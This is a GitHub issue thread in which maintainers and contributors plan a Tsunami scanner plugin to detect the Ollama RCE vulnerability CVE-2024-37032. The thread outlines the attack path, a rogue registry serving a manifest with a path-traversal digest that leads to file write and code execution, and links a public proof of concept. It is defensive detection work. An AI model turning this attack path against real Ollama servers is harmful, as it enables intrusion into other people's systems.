-
Notifications
You must be signed in to change notification settings - Fork 190
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
AI PRP: Ollama Remote Code Execution Vulnerability #511
Comments
Hi @grandsilva, Could you start by writing a fingerprint for ollama to start? ~tooryx |
Hi @tooryx |
Thanks @grandsilva. Anyone that is interested in writing that fingerprint can then create the issue and I will accept it. Feel free to suggest other plugins in the meantime. ~tooryx |
@grandsilva Could you start the vuln research, and focus on these 2 areas:
Please provide timely response, I will monitor this thread. Thanks! |
@maoning we need to host a docker image, hosing the image is possible with the GitHub container registry. Another option is hosting a docker image with a web server with 4 or 5 endpoints( with Docker Image Manifest V2) Although, We can send arbitrary get requests to check the exposed API server, but it is unlikely to validate arbitrary file write and file read CVEs with SSRF. |
@grandsilva could you elaborate more on how the docker image interacts with the target Ollama service? |
OK sorry about the bad explanation. An API endpoint for the Ollama web server allows for arbitrary docker image pull, arbitrary means from an arbitrary server. We need to control this docker image registry HTTP server because we need to send our payload when we as the Ollama web server pull our docker images(as an exploit payload) A researcher already wrote the http server: https://github.com/Bi0x/CVE-2024-37032 we can request an arbitrary URL to pull the docker images, therefore we can send a get request to the tsunami callback server. |
Hey @grandsilva, Could you take a look with using images such as curl or bash to try to communicate with the callback server? Would that work? Would any image or deployment be left after exploitation on the target? Cheers, |
Hi @grandsilva, What are your thouhgts on this? ~tooryx |
Hi @grandsilva, I will discuss this with the rest of the team, but we are a lot less interested by GeoServer as far as I know. ~tooryx |
Hi @grandsilva, In that case, I will release this one to be grabbed by other contributors. ~tooryx |
Hi @OccamsXor, you can work on this. ~tooryx |
I checked a couple of vulnerability analysis posts for CVE-2024-37032 and it seems that exploitation of the vulnerability requires a web server which would behave as a private registry and supply a malicious manifest file, that contains a path traversal payload in the digest field, to the vulnerable system. @grandsilva also mentioned the same issue here: #511 (comment) My question is this: Does Tsunami have the functionality that would allow us to start a custom web server during scanning? This web server should be able to serve responses which are determined by the plugin. Ref: https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032 |
Hi @OccamsXor, No, currently Tsunami does not have such capability. I will chat with the rest of the team to see if we can find a solution for this. ~tooryx |
According to this research:
This RCE needs to use an arbitrary file write to gain RCE. I'm not sure if this is the preferred method for writing tsunami plugins.
If you're interested in developing a tsunami plugin to detect exposed Ollama HTTP servers, I'll proceed with further research on this case.
(however, I think it is one of the most popular open-source GitHub repositories currently, maybe the most popular)
links:
https://github.com/ollama/ollama
https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032
The text was updated successfully, but these errors were encountered: